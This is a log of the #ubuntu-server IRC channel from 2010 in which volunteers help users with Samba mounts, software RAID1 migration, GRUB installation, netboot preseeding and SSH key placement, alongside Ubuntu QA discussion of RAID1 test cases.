<illytacos> Hola amigos, I have a bit of a situation and I know I've been in here asking a lot of questions and I appriciate the help!!!!!! I have some questions around configuring a SAMBA file server (using Ubuntu Server Edition 10.04) Right now all I need to do is be able to see the file server on a windows machine. I'm following this article: https://help.ubuntu.com/community/MountWindowsSharesPermanently am I more or less on the righ
<illytacos> Hey folks, sorry to be a pest, anyone around to assist with this question? -> I have some questions around configuring a SAMBA file server (using Ubuntu Server Edition 10.04) Right now all I need to do is be able to see the file server on a windows machine. I'm following this article: https://help.ubuntu.com/community/MountWindowsSharesPermanently am I more or less on the right track or am I spiraling out in the wrong directi
<st_iron> as i know you have to use the cifs.mount command
<st_iron> and give the recommended parameters to it
<illytacos> ahhh ok so not smbfs it's cifs
<st_iron> shortly: you have to mount it like a samba share
<st_iron> sure let's try
<illytacos> hm ok, so I think I'm stuck on SAMBA share because this is my first time ever setting this up and configuring.
<kinygos> i suspect my server crashed during the dd, but on reboot, ignoring the serious errors found on each partition, i have a running os with RAID1 "configured" on the second disk...
<st_iron> it is not difficult, just read the docs when you have free time :)
<kinygos> unfortunately, when i try to install grub on that disk, i get the error "the file /boot/grub/stage1 not read correctly"
<illytacos> st_iron: I've been reading https://help.ubuntu.com/community/MountWindowsSharesPermanently and going through it but is this the correct article? I'm scared I might have picked up the incorrect documentation
<illytacos> learning on the fly. always fun lol.
<st_iron> illytacos: I have used cifs at work for mount the windows and samba shares
<st_iron> use the 'man cifs' command and you can get the correct configuration
<st_iron> you learn more when you make it yourself like a puzzle
<kinygos> i'm baffled...i've pasted my fdisk -l output to http://dpaste.com/250649/  can anyone spare me a few moments to suggest some checks i can make ?
<illytacos> st_iron: thanks!
<st_iron> illytacos: you're welcome
<kinygos> is it possible to manually install grub on a hard disk?  i can find instructions on how to install on a floppy disk...
<st_iron> kinygos: grub-install command ;)
<kinygos> i did that, but it fails...it finds /boot/grub, but then says it cannot read /boot/grub/stage1 correctly
<kinygos> i suspect that it's trying to read the file that has been dd'd onto that disk, but is unreadable as it is under raid
<kinygos> wow...i have a real feeling i'm close...if SpamapS is still on, i could sure use some advice....
<kinygos> i booted onto the second hard disk, and i now have a grub interactive prompt
<kinygos> is it possible to install grub on that disk from that prompt?
<JasonMSP> i figured it out
<JasonMSP> wrong window.. sorry!
<kinygos> can anyone confirm, if my second disk was listed as (hd1) in devicemap, root (hd1) will install grub on it?
<kinygos> sorry, root (hd1) followed by setup (hd1) ?
<mibocote> top and free indicate that the server is using 6.5/8G, but adding up the memory usage of all the processes gives about 1.6G. The 6.5G is without buffers/cache. Any ideas?
<uvirtbot> New bug: #651432 in bacula (main) "package bacula-director-mysql 5.0.1-1ubuntu1 failed to install/upgrade: underproces installed post-installation script returnerede afslutningsstatus 1" [Undecided,New] https://launchpad.net/bugs/651432
<b0gatyr> hi everyone, what's a good content management system or portal for use in a corporate environment where they need to post files/docs and allow only certain people to view them?? I was thinking Moodle? any other suggestions??
<kinygos> is there a way to tell if dd is working or hung?
<shauno> kinygos: it'll tell you its progress if you send it SIGHUP
<scrllock> running strace on the PID works too
<kinygos> shauno: thanks...just trying to figure out how to do it :)
<kinygos> scrllock: i'll look at that too...thanks :)
<kinygos> hmm...i'm "running" dd in a remote kvm session (lights out board)...logging in through putty and i only see 2 processes running...bash and ps...am i really tired, or does that mean dd is not running?
<scrllock> what does 'ps aux | grep dd'
<scrllock> say?
 * pennyless is back.
<kinygos> scrllock: lots of baffling stuff...
<scrllock> mind putting it in a pastebin?
<kinygos> sure
<kinygos> scrllock: http://dpaste.com/250696/
<kinygos> scrllock: thank you for helping
<scrllock> ok, the 1641 PID is the one you want
<scrllock> strace -p 1641
<scrllock> or sending it it SIGHUP
<kinygos> strace -p 1641 has generated shedloads of stuff...and it's still going
<kinygos> can i ^C that?
<scrllock> sure
<scrllock> so you know it's still going then
<kinygos> lol...awesome :)  thanks scrllock
<scrllock> np sir
<SpamapS> kinygos: how is the raid setup going?
<SpamapS> kinygos: I see you continued the dd... I'm pretty sure thats going to fail. :-/
<uvirtbot> New bug: #651535 in php5 (main) "package libapache2-mod-php5 5.3.2-1ubuntu4.5 failed to install/upgrade: Unterprozess installiertes pre-removal-Skript gab den Fehlerwert 1 zurÃ¼ck" [Undecided,New] https://launchpad.net/bugs/651535
<kinygos> SpamapS: slowly...i thought dd had hung earlier when it hadn't...i've started it again since...waiting for it to complete (i know you said it's a bad idea...but i kinda had it in my head to try this way and if it fails, start again tomorrow morning)
<kinygos> SpamapS: i pasted my fdisk -l dump http://dpaste.com/250649/...the disks have the same characteristics, so it may succeed
<kinygos> SpamapS: if you have 2 secs, maybe you could have a quick look at them and tell me if anything looks obviously wrong?
<SpamapS> kinygos: It really doesn't matter if the disks are the same characteristics
<SpamapS> kinygos: Oh hmm.. MD seems smarter than I had thought
<SpamapS> kinygos: I suppose it will work then. :-P
<kinygos> SpamapS: maybe :)
<kinygos> SpamapS: i hope i can install grub on that second disk...
<SpamapS> kinygos: The usable blocks is the same, so yeah, maybe
<SpamapS> kinygos: 250G is going to take a long time. ;)
 * RoyK taps his 50TB setup
<kinygos> SpamapS: am considering going to bed and checking back in the morning :)
<SpamapS> RoyK: 50's pretty good.. I remember being excited with my first 1.5TB box.. now I have 1TB in my backpack. ;)
<kinygos> SpamapS: i will be so chuffed if this works
<RoyK> SpamapS: we're setting up a couple of 115TB systems soon for bacula
<SpamapS> kinygos: if you've got a blog, post your experiences.. would be good as encouragement for the next person who needs to do that. ;)
<mathiaz> SpamapS: o/
<SpamapS> RoyK: removable disks too?
<SpamapS> mathiaz: \o
<RoyK> SpamapS: zfs
<mathiaz> SpamapS: would you have time to do maverick-server-i386 RAID1 test case?
<RoyK> SpamapS: 8 drives in each raidz2 vdev
<mathiaz> SpamapS: http://iso.qa.ubuntu.com/qatracker/test/4609
<mathiaz> SpamapS: it's on the last test case to go thourgh
<SpamapS> mathiaz: was just about to start it. :)
<mathiaz> SpamapS: I'll do the preseeded
<kinygos> SpamapS: definitely...gotten so much help online, it will be so good to make a contribution, however small
<mathiaz> SpamapS: o^5
<RoyK> SpamapS: it should be quite safe
<SpamapS> mathiaz: I wanted to discuss the test instructions w/ somebody before editing them..
<SpamapS> mathiaz: I believe there are some bad practices suggested in the test.
<mathiaz> SpamapS: for example?
<mathiaz> SpamapS: are you referring to http://testcases.qa.ubuntu.com/Install/ServerRAID1?
<SpamapS> mathiaz: disconnect 1 drive, boot, check, halt, reconnect drive, disconnect other, boot, check, halt, reconnect drive... produces a VERY unstable system, which I would actually expect.
<SpamapS> mathiaz: yeah
<SpamapS> mathiaz: you create diverged RAID1's
<SpamapS> where its not clear which one is "correct"
<mathiaz> SpamapS: right - I notice some issue with this one as well
<mathiaz> SpamapS: last time I ran the test the RAID1 array would actually autosync
<SpamapS> so we just need to plug instructions in there to reconnect and boot again.
<SpamapS> mathiaz: its a race condition
<SpamapS> mathiaz: SOMETIMES it can tell
 * mathiaz nods
<SpamapS> but we shouldn't test for something we would never support
<mathiaz> SpamapS: the main point of the test case should be to cover a real-world use case
<mathiaz> SpamapS: it seems that the sequence you've outlined doesn't necessarly make sense
<SpamapS> if somebody did this in the real world, they just broke their RAID ;)
<mathiaz> SpamapS: well - it may happen unintenionaly
<mathiaz> SpamapS: bad luck
<SpamapS> so it should be disconnect disk0, boot, check, halt, reconnect disk0, boot, check, halt, repeat w/ disk1
<mathiaz> SpamapS: ie: reboot a system the controller goes flaky
<mathiaz> SpamapS: right - that makes more sense
<mathiaz> SpamapS: it may be worth thinking about corner cases though
<SpamapS> mathiaz: right but the MD driver doesn't really have a way to guarantee it can recover from this split raid situation.
<mathiaz> SpamapS: right - in that case it should just drop and no try
<mathiaz> SpamapS: it seems that it still tries correctly
<SpamapS> If nothing else..
<SpamapS> it should drop to a "CRAP we can't tell which disk is right!" state and ask you to pick.
<SpamapS> but thats really.. way way deeper than I think we are expecting from MD
<mathiaz> SpamapS: yeah - we had a long conversation about what should be the safe behavior
<mathiaz> SpamapS: it's a complicated issue
<mathiaz> SpamapS: and corner cases matters a lot
<SpamapS> It really, really, must not be complicated.
<SpamapS> If it is, then we fail. :(
<mathiaz> SpamapS: as we really don't wanna scratch data
<mathiaz> SpamapS: it's complicated to detect in which state you are IIRC
<SpamapS> Right, it should be a "fail early, by default" type of system.
<kinygos> that test case as described without booting with 2 disks in between is a highly unlikely corner case that would probably be caused by some other part of the system (imho ofc)
<mathiaz> SpamapS: kees and kirkland discussed that for hours in the intrepid cycle IIRC
<SpamapS> mathiaz: indeed, all you have in the superblock is the number of mounts, IIRC, which may or may not be helpful.
<SpamapS> the point is any time you have a system where you have two-way information flow, you need some kind of guide to ensure they are in sync/out of sync.
<SpamapS> so I understand that we will, in fact, torch the disks right now if you do the scenario described
<SpamapS> because our sync method is vulnerable to misinformation
<mathiaz> SpamapS: right - it may be worth filing a bug about this issue
<SpamapS> thats my second point..
<mathiaz> SpamapS: and talk with kees and kirkland about it at the next UDS
<SpamapS> mdadm has a ridiculous number of bugs open. :(
 * kirkland has no interest in discussing RAID/failover implementations in Ubuntu any more
<kirkland> there is no way of pleasing everyone
<mathiaz> SpamapS: as for the test cases what would you recommend to do?
<kirkland> and everyone has their own opinion
<kirkland> most of which are horribly uninformed
<SpamapS> 78 open, 40 new
<kinygos> apologies
<SpamapS> kirkland: I can understand. It stems from the conflicting goals Ubuntu users have.
<kees> documentation is the answer.
<kees> "here is what we did for RAID"
<kees> mathiaz: does the Server Team have a FAQ?
<mathiaz> kees: hm - not a *User* FAQ
<kirkland> kees: +1
<kirkland> SpamapS: sorry, not taking offense;  i've just been beat up on this one too much
<kirkland> SpamapS: we're miles and miles and miles beyond where we used to be, pre-hardy, with respect to RAID
<kirkland> SpamapS: if you or anyone else wants to take it from here, be my guest :-)
<kees> though please don't change the existing defaults, as they were well discussed.
<kees> the expected behaviors should remain the same; that's what took so much time to nail down.
<SpamapS> No I don't want to change any defaults.
<SpamapS> I want to change the test cases.
<SpamapS> I'm just lamenting that we don't have an easy way to know the RAID1 is out of sync if you do what the test case suggests (write to each disk individually without ever syncing)
<SpamapS> interesting
<SpamapS> when I install from starbucks it guesses that I'm in New York, when I install from home, it guesses Los Angeles
<mathiaz> SpamapS: well it's simple: you're connecting to a starbucks in New York via wifi
<SpamapS> :)
<SpamapS> actually ip2location.com guesses Newport, Rhode Island
<SpamapS> heh.. I just typed this and it looked funny to me..
<SpamapS> clint@ubuntu:~$ watch !!
<SpamapS> like.. hey.. you... WATCH!!
#ubuntu-server 2010-09-30
<Jeeves_Moss> is there a image program that'll make hashes out of image files, then use the hash to compair them?  I'm looking for a way of looking for duplicates in ~200,000 images and removing them
<SpamapS> find . -type f -print0 | xargs -0 md5sum | sort | uniq -w32 -d --all-repeated=separate | cut -c35-
<SpamapS> from http://ubuntuforums.org/archive/index.php/t-97701.html
<SpamapS> its unfortunate though..
<SpamapS> that it md5's the whole image
<SpamapS> would be cooler if you could just find all of the files with the same # of bytes, and then md5 only those.
<SpamapS> Jeeves_Moss: thats parallelizable too.. add  -P2 to the xargs and it will run two md5's at a time. :)
<Jeeves_Moss> SpamapS, this will be a scrape site eventually.  I'd like to be able to make a hash that's semi smart,toss it into a database, then when new files are d-loaded, it hases them, then compares them
<SpamapS> well thats pretty specialized ;)
<SpamapS> but very easy
<SpamapS> if you're already writing code
<SpamapS> Jeeves_Moss: you might want to use a collapsing hash algorithm then. size first, then crc32, then hash
<Jeeves_Moss> SpamapS, lol, yea.  the "code" will be a cheap/dirty (kinda like my ex-wife) script that scrapes a set of URLs to pull the files to the local box.  Then hash them, and do a compairison of what's in the databse.
<Jeeves_Moss> SpamapS, if it finds comething clise, it'll flag it for human attention.
<SpamapS> "close" is a pretty tough thing for a computer to determine. ;)
<Jeeves_Moss> SpamapS, eventually, I'm going to figure out how to make the script run times to be dynamic so they'll throtle their scrape runs baised on the number of new pics posted
<SpamapS> Jeeves_Moss: good luck on your porn search.. I have to be going. ;)
<Jeeves_Moss> SpamapS,  lol, how'd you know it was porn?  LOL
 * SpamapS just wasn't going to admit that he already wrote the same thing for the same purposes
<SpamapS> ok.. I realy do have to go
 * SpamapS runs off
<Jeeves_Moss> SpamapS, if you want, e-mail it to me.
<mathiaz> hggdh: hi!
<mathiaz> hggdh: what's the status of maverick-i386 UEC testing?
<mathiaz> hggdh: http://iso.qa.ubuntu.com/qatracker/test/4609 <- UEC install (minimal topology) is not started yet
<MrDowntempo> Hi
<MrDowntempo> I'm trying to install ubuntu-server on a machine with no swap. Is this possible or simply the acme of foolishness?
<Patrickdk> how much ram will you have?
<Patrickdk> and what will it be doing?
<Patrickdk> it's not really foolish
<Patrickdk> but you just have to be careful, cause oom will attempt to protect the system, and won't care what it kills (like ssh)
<MrDowntempo> I should clarify. I want to install the OS on an SSD. I have a 3TB raid 5 hardware Raid card
<MrDowntempo> I have a gig and a half of RAM
<MrDowntempo> But should be able to up it to 3gig soon
<Patrickdk> I don't see how that clairifies anything
<MrDowntempo> It will be a fileserver local and online
<MrDowntempo> Well u usually don't want swap on SSDs or raid
<Patrickdk> what kind of fileserver? samba? ftp? apache? lighttpd? nginx?
<MrDowntempo> Samba and FTP
<Patrickdk> heh? swap on raid is awsome :)
<MrDowntempo> Lol
<Patrickdk> swap on ssd is great also
<Patrickdk> life of ssd with swap, depends on how much use change swap pages
<Patrickdk> I never payed attention to samba ram usage, other than it never mattered to me
<Patrickdk> but I would say, as long as you keep good amounts of cache/buffer space you should be fine
<MrDowntempo> Should I just put a swap partition on the SSD and be done with it?
<Patrickdk> but it only takes a program to go nuts once, to cause issues
<Patrickdk> I would be tempted to put a swap partition on it, and set swappiness to 0
<MrDowntempo> The install always fails when it sees no RAID
<MrDowntempo> Another option would be to pick up a small fast HDD. Like the old 74gb velociraptor and use that in its entirety
<MrDowntempo> But that means spendin mo money. And I donwanna
<Patrickdk> I was looking at a pcie ssd solution for my new server
<Patrickdk> but the ibis just came out, and that looks interesting as hell
<MrDowntempo> I'm sorry it fails when it sees no swap
<MrDowntempo> Not raid
<Patrickdk> what fails?
<Patrickdk> I've installed ubuntu server without swap before
<MrDowntempo> The install says it can't continue without swap
<MrDowntempo> Hmmmmnnnrrggh
<Patrickdk> you using a cd?
<Patrickdk> I always pxe boot into the installer, might be different
<MrDowntempo> Actually USB
<ScottK> mathiaz: Since it seems puppet is the main user of Ruby in main, would you please have a look at Bug 638164 and make a recommendation?
<uvirtbot> Launchpad bug 638164 in ruby1.8 "Sync ruby1.8 1.8.7.302-2 (main) from Debian unstable (main)" [Wishlist,Incomplete] https://launchpad.net/bugs/638164
<mathiaz> ScottK: I'd ask the security team about the sync
<|rt|> anyone know why the server installation cd uses the desktop kernel?  Makes dealing with supplying a driver for a disk controller a total pita
<mathiaz> ScottK: I don't think we'd need to sync from Debian given where we are in the release cycle
<mathiaz> ScottK: I don't have enough knowledge about ruby to evaluate all the changes introduced (which are minor BTW)
<|rt|> b/c you need one driver built for the install process and another to get the installed system to survive a reboot
<mathiaz> ScottK: so I'd seek the security team opinion on the bug
<pmatulis> for network installs using the alternate installation, where do i get the kernel and initrd for tftp booting?
<zul> pmatulis: the same directory where your image is
<zul> pmatulis: or you should be able to get it from the alternate cd
<pmatulis> zul: yeah, from the cd.  but in the online archive there is just
<pmatulis> zul: http://archive.ubuntu.com/ubuntu/dists/lucid/main/installer-amd64/current/images/netboot/ubuntu-installer/amd64/
<pmatulis> zul: so above is for server?
<zul> i think so
<twb> pmatulis: those d-i images don't understand the distinction between "desktop" and "server"
<twb> That distinction basically boils down to different preseed files (and different packages in the on-CD pool).
<pmatulis> twb: that's what i don't understand
<pmatulis> twb: if i'm setting up netbooting and i want to use the "alternate cd" installation, what files do i use?
<twb> In other words, if you only use the kernel and ramdisk, it won't give you any server- or desktop-specific questions.
<twb> What you probably want to do is grab the preseed file from the CD and put it on an HTTP server
<twb> Then when you bootstrap the netinst kernel, pass it url=http://path/to/preseed/file
<twb> This information is mainly explained in the installation-guide-<arch> appendices, which you can apt-get install.
<pmatulis> twb: so with netbooting, the install process always looks the same?
<pmatulis> twb: it's just the preseed that determines the outcome?
<twb> From my own experience, basically the only difference is 1) different tasksel choices; and 2) language packages are installed by default.
<twb> Right, it's just the preseed file
<twb> I suggest you read the preseed files of the server and alternate CDs to get an idea of the differences
<pmatulis> twb: and if i don't use a preseed file?  what do i end up with?  :)
<twb> If you don't use a preseed file you get12:00 <twb> From my own experience, basically the only difference is 1) different tasksel choices; and 2) language packages are installed by default.
<twb> With a preseed file, behaviour should be identical to the CD you got the file from.  The only difference would be that it asks about network configuration before udebs (in expert mode).
<pmatulis> twb: alright, that clarifies things a bit
<pmatulis> twb: need to try
<pmatulis> twb: thanks
 * twb knows all!  Tell you friends!
<hggdh> mathiaz: My bad, then, I ran it earlier today. Will update the entry
<mathiaz> hggdh: great - so the test ran
<mathiaz> hggdh: it's just the result that wasn't reported to iso.qa.?
<hggdh> oh
<hggdh> mathiaz: sorry, i386 was not run, will do it now
<hggdh> mathiaz: but I do expect it to run, libvirt was fixed
<mathiaz> hggdh: glad to hear that
<mathiaz> hggdh: what was the issue with libvirt?
<mathiaz> hggdh: was this fixed for RC?
<hggdh> mathiaz: it was missing an #include, which caused a failure only on i386
<hggdh> this was fixed a week ago, IIRC, by Jamie
<mathiaz> hggdh: ah ok
<hggdh> but doing it now. Sorry for that
<hggdh> mathiaz: BTW -- care to get together (Ara, Ev, you, JamesP, and myself) on UDS to discuss Hudson?
<mathiaz> hggdh: not at all - we should definetely meet up
<hggdh> thank you
<mathiaz> hggdh: I'm currently in the process of setting a Hudson master in EC2
<mathiaz> hggdh: so that you can have a look at how things are presented later this week
<mathiaz> hggdh: we'll probably test the final maverick -server iso with it
<uvirtbot> New bug: #651720 in openssh (main) "Hardy OpenSSH version out-of-date - security risks" [Undecided,New] https://launchpad.net/bugs/651720
<hggdh> mathiaz: cool! Please point me to the right place when it goes live
<mathiaz> hggdh: will do!
<ScottK> mathiaz: Thanks
<w0_> hi.  I installed apache2 and it loads the default page when I try to connect.  when I type 'ps' there's like two things, not including apache. for some reason, 'apache2ctl -k stop' looks at 127.0.1.1 instead of 127.0.0.1.  how can I stop apache2, and how can I keep it from starting at bootup?  much thx
<^slacker^> w0_ : to disable services at bootup you can use the update-rc.d tool to remove it from startup
<^slacker^> w0_ example: # update-rc.d -f apache2 remove
<twb> s/remove/disable/, surely
<twb> Except it's probably an upstart job in 10.04, so you need to do something horrible instead
<smoser> mathiaz, ping
<mathiaz> smoser: hi!
<smoser> you're always so chipper
<smoser> :)
<smoser> i think bug 651698 is more likely related to
<uvirtbot> Launchpad bug 651698 in cloud-init "Second login to ssh_import_id in cloud-config doesn't get added to authorized_keys file " [Undecided,New] https://launchpad.net/bugs/651698
<smoser> $ ssh-import-lp-id james-page
<smoser> WARNING: Invalid keys at [https://launchpad.net/~james-page/+sshkeys]
<mathiaz> smoser: hm - ok
<hggdh> mathiaz: yay, euca i386 works now :-)
<mathiaz> hggdh: \o/
<mathiaz> hggdh: thanks for testing this out
<hggdh> mathiaz: sorry for having forgotten the i386... I marked it done (and also tested some others, as a consequence)
<smoser> mathiaz, i think the patch for ssh-import-id is http://paste.ubuntu.com/502995/
<smoser> but the easy fix is to tell james not to use windows
<hggdh> heh
<uvirtbot> New bug: #651698 in cloud-init (main) "Second login to ssh_import_id in cloud-config doesn't get added to authorized_keys file " [Undecided,New] https://launchpad.net/bugs/651698
<hggdh> mathiaz: the only one left is JeOS under ESX, which I cannot do. I also (of course) tested the i386 UEC images
<hggdh> and amd64...
<mathiaz> hggdh: great
<mathiaz> hggdh: usually someone in QA does JeOS under ESX
<mathiaz> hggdh: AFAICT noone in the server team has acccess to an ESX server
<hggdh> mathiaz: well, I am QA ;-) and I do not know of any ESX server, so must be somebody else
 * mathiaz nods
<mathiaz> hggdh: may be ask marjo?
<hggdh> hum. Will see if he is still logged in
<hggdh> he is online, and shot a Q to him. Let's now wait and see if he is also awake
<mathiaz> smoser: great - the patch fixes the issue - thnaks
<hggdh> mathiaz: no response from marjo, I will check with the QA folks tomorrow morning
<mathiaz> hggdh: thanks for helping out!
<hggdh> yw
<uvirtbot> New bug: #651754 in php5 (main) "GD Bundle and Feisty" [Undecided,New] https://launchpad.net/bugs/651754
<Ichat> [question] is there some way to  upgrade linux (software) raid  from  example   3x 1tb  to    5x  1tb  (without lost data)
<qman__> yes, I have done it before
<qman__> assuming raid 5?
<Ichat> yes raid 5
<qman__> yeah, you can simply add the disks to the raid, then expand your filesystem
<qman__> if you're using LVM, you have to expand that too
<qman__> I don't remember the exact procedure off the top of my head, but it's certainly possible and documented
<Ichat> im not using lvm because i couldn't get it to work in hardy - im wanting to upgrade soon, and  add diskspace also i didn't know that  soft-raid was that flexible...  i asume that when i 'add those disks  that the array will  get 'degraded'  for a while?
<qman__> it will have to rebuild
<Ichat> i see
<qman__> which with that much data could take a considerable amount of time
<qman__> I had a 6x500GB array, and added two more disks
<qman__> with some tweaking to allow it to use the full bandwidth available, it took about a day and a half to rebuild
<Ichat> what cpu ?
<qman__> CPU isn't really important, it's disks and disk controllers
<qman__> but it was an athlon 64 3500+
<qman__> mine were mostly limited because I had 4 disks on the PCI bus and 4 on the onboard controller
<qman__> as opposed to, for example, a PCIe x4 or x8 controller
<qman__> CPU becomes more important with raid 6 though
<Ichat> hmmz.  what i ment was,  -  for exaample  a pent 4  will have considerably lower  i/o  than a  sock 940 / am2 opteron  or a    s755 core2 duo
<Ichat> btw mine is a  939 opteron 165 (dual 1,8)  so it wont be noticebly faster than what you did i fear :P
<qman__> ah, yeah
<qman__> good chip though, I have two of them
<qman__> one overclocked to 2.7GHz
<Ichat> mine runs a 2,3  i cant unlock it :( and couldn't get it stable on higher speeds
<Ichat> but most of the time  Cool-N-Quet runs it down to 1,8 again :
<qman__> they will take some punishment, that one I have at 1.475v, has hit 75C under load before, it takes it all
<qman__> but you need a good board and RAM to get it that high
<qman__> since it's only a x9 multiplier
<qman__> mine's at 300 fsb
<qman__> but anyway, my file server is also a 939
<qman__> expect the whole process to take your server out of commission for 2-3 days
<Ichat> what pc case (that helps if its a good one)  i recently got a   nzxt thempest    (2x 140mm top)   1x 120mm rear   3x 120mm front
<qman__> for the overclocked chip, I used to have a modified $20 cheapo with some 120mm fans
<Ichat> i couldn't get my cpu  over  53C  even when room temp was over  31C
<qman__> now it's in a 40mm ammo box
<qman__> with 3 80mm fans
<Ichat> that case ROCK and gets me  12 hdd's  if only i hade â¬ for sata controlers
<qman__> pictures here, if you're interested http://qman.strangled.net:8080/pics/ammo-box-pc/
<qman__> for the file server, I've got a cooler master 590
<Ichat> i wanted an antec 1200  but than this case came allong, only thing was,  that i got damaged in transport  so no on/of button  leds or usb stuff... just the case  thats why i got this   $100 case for less than  $40
<qman__> good deal
<qman__> my cooler master was about $65
<Ichat> i just hade to 'rip appart an old atx case that i had witch was  a sweex ...
<qman__> but I had to buy some fans and bay adapters
<qman__> my first file server was a heavily modified emachines micro ATX case
<Ichat> i just  removed the sweex's  front pannel and  glued that to the tempest case :P
<qman__> after drilling some holes and using some pieces of erector set, I managed to cram 7 hard drives in it
<eagles0513875> hey guys i am trying to install some public ssh keys where do i put the public keys?
<Ichat> btw the mod went terribly bad - and looks BUD-ugly but i does function perfectly so i dont really care
<qman__> eagles0513875, I only know how to use ssh-copy-id, not sure if that will do what you want
<eagles0513875> well i generated this on a windows machine just not sure where to put the public key once uploaded via sftp
<eagles0513875> do i put it in /home/.ssh/?
<qman__> I think ssh-copy-id creates ~/.ssh/id_rsa.pub
<qman__> so I'd try that
<qman__> no, that's wrong
<qman__> that's where it generates it in the first place
<eagles0513875> ok
<eagles0513875> im reading the !ssh
<eagles0513875> !ssh
<ubottu> SSH is the Secure SHell protocol, see: https://help.ubuntu.com/community/SSH for client usage. PuTTY is an SSH client for Windows; see: http://www.chiark.greenend.org.uk/~sgtatham/putty/ for it's homepage. See also !scp (Secure CoPy) and !sshd (Secure SHell Daemon)
<eagles0513875> documentation the first link and its saying /home/.ssh of that user
<eagles0513875> does that seem right to you?
<qman__> looks like it adds it to ~/.ssh/authorized_keys
<qman__> reading through man ssh-copy-id
<eagles0513875> qman__: wrong
<eagles0513875> thats for Encrypted Home Directory according to the link
<eagles0513875> the authorized keys if you read above troubleshooting it says otherwise
<qman__> ~/.ssh should have noting to do, directly, with encrypted home
<eagles0513875> ok
<qman__> though ssh key auth wouldn't work normally if you have encrypted home
<qman__> you'd have to put your keys in a different location
<eagles0513875> ok
<eagles0513875> would ssh-copy-id work even if the key wasnt generated on the machien you want to run it on
<qman__> I see what it's saying
<qman__> if you don't have encrypted home, add it to ~/.ssh/authorized_keys
<qman__> if you have encrypted home, add it to /etc/<username>/authorized_keys
<eagles0513875> ahh ok so i just need to add it to the authorized keys file in my home dir
<qman__> and yes, you can manually specify a key file on the command line to ssh-copy-id
<eagles0513875> ok i can just upload to my home folder then copy it in?
<eagles0513875> using ssh sopy
<qman__> yes
<eagles0513875> ok kool :) thanks
<kinygos> hi...i have a remote server running 10.04LTS, it has a second physical disk which was not partitioned or mounted, and i'm trying to install RAID1...there is no data on the server, but i'm not able to control the OS installation (it's done by some imaging software the ISP has)...
<kinygos> i've created my raid on the second physical disk, and updated the md config...
<kinygos> i'm now trying to copy the contents of the first disk (the one with the OS that is currently running) onto the RAID
<kinygos> i started a dd command last night, but it failed (my mistake completely, the RAID is logically smaller than the physical disk)
<kinygos> is there another way i can copy all the data from the mounted partitions on the first physical disk to my unmounted RAID device?
<qman__> you're not going to be able to do a direct image, you'd either have to use something like partimage which removes the free space, or just do a simple file copy
<qman__> I wouldn't recommend doing a file copy online, suggest booting to a live (or otherwise alternative) environment first
<spenser> Hi, is it possible to transform a private CA into a public CA by having the private CA signed by the public CA?
<kinygos> qman__: i know...i do have remote kvm access through a lights-out board, so can start again if i bugger it up
<twb> kinygos: if you don't need the result to be mountable, you can just write something like a cpio or tar archive DIRECTLY onto the RAID array
<twb> e.g. find /home | cpio --create >/dev/md0
<twb> If you need it to be mountable but don't want to mount the destination filesystem in advance, you could try mksquashfs or genext3fs
<kinygos> twb: my plan is to reboot the server, but boot from the second disk (thereby starting the RAID), then add the original disk to the RAID
<twb> Shrug
<qman__> it's a difficult task any way you look at it
<twb> FSVO difficult = tedious
<_ruben> mount the target partition at some place, then use cp with a ton of options to copy the data (cp -a might be enough, don't recall)
<coder> hi, I've just noticed a process named bond0 in my 10.04.1 server, which I don't see in other 'bonded' servers with, ie, centos
<kinygos> awesome, thanks twb, _ruben, qman__
<coder> is that normal?
<coder> ok, it seems normal, also seen on centos
<coder> forget it
<twb> _ruben: cp -a will suffice for most everything -- the main exceptions will be /proc and possibly hard links
<twb> When I'm copying from an active root filesystem, I usually lvm snapshot it then mount and copy that.  That avoids /proc nastiness, even when the last sysadmin was silly and did things like /var/lib/named/proc
<twb> */var/lib/named/chroot/proc, I mean
<Riddell> anyone able to sign off on the ubuntu server RC release for lack of jiboumans?
<_ruben> twb: there's some directories that need exclusion indeed
<kinygos> _ruben, twb: noob question, if i mount my raid at /raid, is there an easy way to exclude it from the cp?
<_ruben> kinygos: i tend to go at it the other way around: just specify the dirs you *do* want to copy .. else do smth like find / | grep -v dir1 | grep -v dir2 | xargs cp --target-dir=/raid
<_ruben> unless cp doesnt have --target-dir, i know mv does
<kinygos> ok, thanks :)
<twb> kinygos: you usually would use -xdev in whatever guise the command in question provides it
<uvirtbot> New bug: #651875 in bind9 (main) "Bind 9.7.0-P1 validation errors" [Undecided,New] https://launchpad.net/bugs/651875
<spenser> Not trying to be impatient but its been about an hour so I'll ask the question again.
<spenser> Hi, is it possible to transform a private CA into a public CA by having the private CA signed by the public CA?
<uvirtbot> New bug: #651877 in ibmasm-utils (main) "package ibmasm-utils 3.0-1ubuntu9 failed to install/upgrade: il sottoprocesso vecchio script di post-installation ha restituito lo stato di errore 1" [Undecided,New] https://launchpad.net/bugs/651877
<qman__> spenser, not really sure, but there's nothing inherently private or public about a CA, the only differentiation is whether a "trusted" company has signed your certificate
<qman__> and the only effect that has is that web browsers will trust it by default
<twb> the ca infrastructure is a damn rort
<spenser> _qman: Specifically say I have a self signed CA and I want to make it signed by Verisign is that possible?
<kinygos> i have a partition listed in fdisk -l that doesn't appear to be mounted according to /etc/fstab...the System on this partition is Extended, whereas all the others are either Linux swap / Solaris (one of those) or simply Linux....
<kinygos> can that Extended partition be deleted?  i'm struggling with transferring data to my new RAID so want to reduce the amount to copy with dd
<kinygos> bugger...i've just noticed that it sits under all other partitions (going by the Start and End values for all partitions)
<kinygos> so, different question, is there a command to reduce the size of a partition?  it's mostly empty
<kinygos> argh!! i can't seem to install gparted...apt-get fails to fetch many files :(
<alvin> kinygos: Try a partedmagic liveCD/USB
<kinygos> alvin: i think i've buggered the install up with my various attempts to get it RAID'd...going to rebuild and start again
<kinygos> alvin: apt can't read the archive files in /var
<alvin> Could be. apt-get failing is pretty new to me :-)
<kinygos> arvin: thanks though :)
<kinygos> *alvin even
<alvin> Why attempts to create a RAID? What's going wrong?
<kinygos> alvin: it's a remote server, with no access to external media..server build is automated by some imaging system at the ISP end so i can't configure RAID during install...
<kinygos> alvin: after imaging, the server has a second physical drive with no partitions and unmounted
<alvin> kinygos: I see. Well, I haven't done it myself, but there are tutorials to create a RAID on such systems. It should work.
<kinygos> alvin: my plan is to create RAID on that disk, transfer data from first drive to it, install grub on second drive, then reboot onto the second disk (the RAID) and add the first disk to the RAID
<alvin> Transferring data is probably not needed. The rebuild should take care of that. Let me see if I can find something
<svnitcloud> need some help on opennebula express
<svnitcloud> i have some bridge issues
<svnitcloud> and onehost gives STAT err
<svnitcloud> what do i do ?
<kinygos> alvin: thank you very much :)
